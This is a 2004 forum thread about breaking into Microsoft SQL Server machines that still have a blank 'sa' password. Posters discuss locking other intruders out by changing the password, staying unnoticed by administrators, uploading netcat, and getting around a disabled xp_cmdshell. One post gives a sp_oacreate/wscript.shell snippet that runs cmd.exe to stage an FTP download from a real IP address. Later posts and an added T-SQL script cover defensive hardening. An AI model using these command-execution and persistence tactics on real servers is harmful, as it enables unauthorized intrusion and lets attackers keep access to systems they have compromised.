tyler.durden
Feb 9 2004, 07:45 PM
| QUOTE (jockel @ Feb 9 2004, 06:09 PM) |
I think normally a h4x0r wouldn't do that, that's too obvious .. a good method of securing is to deny "execute" rights for sa .. that throws errors like: [Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'. |
ok, thanks for your reply

For me it is not so obvious why a h4xor should not change the password for the sa user... the only negative point I can find is that the dba or sysop discovers this change... am I wrong?
After the attacker has changed the sa pass to a new, more difficult one, it is more difficult for his box to be rehacked.
jockel
Feb 9 2004, 08:33 PM
if you got an mssql box with sa / [null]
you can change pw to secure it ...
those are mssql servers that are installed with IIS in its default configuration (most sysops don't even notice that they have mssql installed with iis) ....
here pw changing is a good method for a h4x0r ..
but if you have a server with a pw set like
sa / network (or something else) then the sysop will probably be using his sql server ... and when you change pw he'll discover he's been h4x0rd very soon ...
so i would say it depends on the situation..
tyler.durden
Feb 9 2004, 08:50 PM
| QUOTE (jockel @ Feb 9 2004, 08:33 PM) |
if you got an mssql box with sa / [null] you can change pw to secure it ...
those are mssql servers that are installed with IIS in its default configuration (most sysops don't even notice that they have mssql installed with iis) .... here pw changing is a good method for a h4x0r ..
but if you have a server with a pw set like sa / network (or something else) then the sysop will probably be using his sql server ... and when you change pw he'll discover he's been h4x0rd very soon ...
so i would say it depends on the situation.. |
very good explanation. Now I understand.
thank you
peter_BB
Feb 10 2004, 11:24 AM
tried it several times, didn't work.. I created the input file for osql and executed it but it never worked on any servers, I dunno what I might be doing wrong :\
tyler.durden
Feb 10 2004, 11:52 AM
| QUOTE (peter_BB @ Feb 10 2004, 11:24 AM) |
| tried it several times, didn't work.. I created the input file for osql and executed it but it never worked on any servers, I dunno what I might be doing wrong :\ |
what have you tried? to secure the mssql? or to execute general cmds?
XRaVeN
Feb 11 2004, 01:45 AM
nice dude thx
peter_BB
Feb 11 2004, 08:52 AM
tyler: I tried to bypass the sql error but it never worked... I prolly did something wrong but don't ask me what ..
tyler.durden
Feb 11 2004, 09:57 AM
| QUOTE (peter_BB @ Feb 11 2004, 08:52 AM) |
| tyler: I tried to bypass the sql error but it never worked... I prolly did something wrong but don't ask me what .. |
ok

I can't help cause I never tried...
Killaloop
Feb 12 2004, 11:32 AM
first of all, thanks jockel for the info.
I have found this info on some Japanese sites before but never got it working (maybe because I couldn't understand the text around the script?) ^^
Well I will give this a try.
Some things I wonder about are ... does this way still work when xpsql70.dll and/or xplog70.dll is missing? Many people delete those files not even knowing what they are for; well, xplog70.dll has a huge list of procedures inside, I was just wondering if it is in any way needed to run this script file?
thx for info
so long
Killaloop
cougar
Feb 12 2004, 12:11 PM
I tried to do it with this method also, didn't work out for me. I've tried it on several servers. But it doesn't really matter I guess, I always change the sql password and install it as a system service + I hide my stro files

that's secure enough
jockel
Feb 12 2004, 12:27 PM
yeah it also works if the dll is deleted ...
to all those people who didn't get it working :
try it out on your own or feel free to contact me by private message or email ..
i'll help wherever i can =)
cougar
Feb 12 2004, 12:39 PM
will try your method

great job!
Killaloop
Feb 12 2004, 01:57 PM
thx for your reply. just found out that it doesn't matter if the dll is missing or not. functions are stored elsewhere ^^
well I still see some things in your script which don't work out for me. will give it some more tries.
another info for the results: it's not difficult to catch the return messages, but for now: if you execute this script and you get code 0, everything worked successfully. Everything besides a null is normally an error message or a return code.
well I would, as his example shows, upload a netcat and execute it.
and first check if your "test-target" is firewalled before coming here telling us it didn't work out for you.
Thx again for your work m8, I will give it some more tries. I know the functions are working, just need to figure out how to use them.
so long
Killaloop
Fantafour
Feb 12 2004, 02:25 PM
Hey Jockel, I don't think that your hack tip is for the public mass. I would prefer it if you kept it secret. Too many kiddies in here!
Killaloop
Feb 12 2004, 04:19 PM
still some work for me ^^
damn where is my sql programmer
Peter Schmidt
Feb 13 2004, 01:23 PM
I just get this error message while connecting with isql to a sql-server:
| CODE |
| DB-Library: Db-library network communications layer not loaded |
I tried to register ntwdblib.dll but nothing changes.
any solutions?
Killaloop
Feb 17 2004, 12:19 AM
nice nice.
I finally got this working for every mssql server I have located so far.
it's not hard to bypass the missing xp_cmdshell. Works on 9 out of 10 without problems. With some other processes I have written it's even no problem to hack into a system if rights for cmd.exe are missing or if ftp.exe or tftp.exe are missing.
it's nearly impossible to stop me from compromising a host once I've got the sql login.
I have written some really nice code for doing so.
However, I won't make it public, so don't ask.
If you're running an mssql server make sure every pass is STRONG (don't mess around with setting up the rights for the accounts, it won't help much)
If you have hacked a mssql server and want to protect it, as I have always said to everyone asking me, do not delete the dlls, replace the weak pass with a good one (since most sql admins don't even know of the existence of the weak sa login)
so long
Killaloop
jockel
Feb 18 2004, 10:40 PM
if all stored procs are deleted and execute and create permissions are denied for SA on a SA/[NULL] box, let's say, then I think there is definitely NO way of getting in ...
if you know any better please let us know killaloop
so just drop all unused stored procs
and deny the rights ..
that's it .. secured
Killaloop
Feb 19 2004, 09:16 AM
hehe
you think dropping all stored procedures in the masterdb is a nice way of securing?
if it's a good box and sql is set up for actual use, the box won't last 2 days if you drop all procedures. And mssql won't even operate, so why would a sysadmin have it running? (hmmm, nice honeypot, ey?)
Another thing is you cannot deny all access for your mssql server.
You normally set up an own user account for mssql which has limited rights (no rights for cmd.exe etc..). You cannot simply deny all execution because mssql server needs some rights to operate.
and even dropping all stored procedures isn't 100% secure since they can be rewritten (in the order they depend on each other).
the only real way to secure mssql is don't let anyone in (for a hacker: change the sa login, for a sysadmin: filter port 1433)
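The hardening that jockel (deny EXECUTE, deny CREATE PROCEDURE) and Killaloop (replace the blank sa password) argue about, written out as an added T-SQL script for SQL Server 2000; this is not code from the thread. It assumes it is run in master by a sysadmin, and the password value is a placeholder to replace.

```sql
-- Added example, not from the thread: SQL Server 2000 era hardening for the sa / [NULL] case.
-- Assumed: run as a sysadmin in master; 'REPLACE_WITH_STRONG_PASSWORD' is a placeholder.
USE master
GO

-- 1. Audit: which logins still have a NULL (blank) password? sysxlogins is the
--    SQL 2000 login table; a row for 'sa' here is the weak login the thread is about.
SELECT name FROM dbo.sysxlogins WHERE password IS NULL

-- 2. Replace the blank sa password (arguments: old password, new password, login).
EXEC sp_password NULL, 'REPLACE_WITH_STRONG_PASSWORD', 'sa'
GO

-- 3. Deny EXECUTE on the shell-spawning extended procedures to 'public', so an ordinary
--    login (a web application login, for instance) gets the "EXECUTE permission denied"
--    error quoted earlier in the thread instead of a command shell.
DENY EXECUTE ON xp_cmdshell TO public
DENY EXECUTE ON sp_OACreate TO public
DENY EXECUTE ON sp_OAMethod TO public
DENY EXECUTE ON sp_OAGetProperty TO public
GO

-- 4. Deny the CREATE PROCEDURE statement in master to 'public', jockel's point about
--    dropped procedures simply being rewritten.
DENY CREATE PROCEDURE TO public
GO

-- 5. Verify what the permissions on the extended procedures now look like.
EXEC sp_helprotect 'xp_cmdshell'
EXEC sp_helprotect 'sp_OACreate'
```

Members of the sysadmin role (sa included) bypass object and statement permission checks, so steps 3 and 4 limit only non-sysadmin logins; for sa itself the strong password in step 2 and filtering port 1433, as Killaloop says, are what actually close the door.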
jockel
Feb 19 2004, 01:46 PM
you didn't listen !!!
with "deny execution and create privileges" I'm not talking about the windows rights system ok ???? ..
i'm talking about SQL !!
Structured Query Language !!
and again !
IM NOT AN F*CKING HACKER !!!
DID YOU UNDERSTAND !????
if i want to secure my OWN MSSQL server i can delete whatever stored procedures I WANT !?? ok ??
and the procedures CANNOT be rewritten if "create procedure" is denied ..
hehe ....
sometimes I'm really wondering if this is a security related board ..
or f*cking FXP scene ......
( sorry for the flame ... but this really pisses me off )
Killaloop
Feb 19 2004, 02:08 PM
I don't know what in my text offended you but you should slow down a little m8
What you said:
"if all stored procs are deleted and execute and create permissions are denied for SA on a SA/[NULL] box, let's say, then I think there is definitely NO way of getting in ..."
a) if they are deleted your sql server isn't operating, so why set up a sql server?
b) the sa login is system administrator, you cannot deny permission to write a procedure to this account. Or what about bruteforcing the admin login? The only way to really secure it is setting up a strong password (what pisses you off about me saying that, or is your English that bad that you don't understand the words I'm writing?)
for your other offenses: I haven't said you are a hacker. I was talking in general about how to secure a mssql server for a sysadmin and for a "hacker". It was not related to you only, cause other people read this thread as well!! So I really don't see what pissed you off (the Hehe at the top of my post? that was related to deleting all procedures .... mssql server isn't operating then and so the server itself is useless, think about it please before you jump onto my neck).
"you didn't listen !!!
with "deny execution and create privileges" I'm not talking about the windows rights system ok ???? ..
I'm talking about SQL !!"
again, if an intruder bruteforced your admin login what happens? You have to set up a limited user account on your system which mssql runs on.
reread this before killing me for something I haven't meant the way it might have sounded to you. Or switch your drugs ^^
jockel
Feb 19 2004, 02:27 PM
hehe ok
then finally let's close this topic ..
I didn't mean to attack u ..
sorry =)
3plx
Feb 22 2004, 05:59 AM
I will explain you my problem: I have sql scan and then I connect to it with sqlexec; when I am typing dir c:\ and then enter
I got sql_error. After I read this article I came back to the scan and did this
declare @s int
exec sp_oacreate "wscripts.shell", @s out
exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo open 65.113.119.148 >> c:\text3.txt
I still got sql_error, is it ok?
or not? What should I do to not get it, plz hlp guyz
and btw why can't I post a new topic? I have some stuff to share with u and I can't post a topic
Gotisch
Feb 22 2004, 12:31 PM
You should never post real ips
Killaloop
Feb 22 2004, 03:10 PM
"declare @s int
exec sp_oacreate "wscripts.shell", @s out
exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo open x.x.x.x >> c:\text3.txt"
well, this won't work since this is the command for a procedure you haven't written into the database. I won't explain to you how you write the procedure since this is not dedicated to script kiddies and others.
3plx
Feb 22 2004, 08:11 PM
First of all I'm not a script kiddie.
I need to know what I am doing, not just be like a donkey typing the commands and that's all.
My problem is that I don't know sql.
I know other languages like c, c++, java,
so plz can u help me to understand how to bypass it
Killaloop
Feb 22 2004, 09:10 PM
the tut is complete and everything you need besides a brain and a putter is described
sorry, this annoys me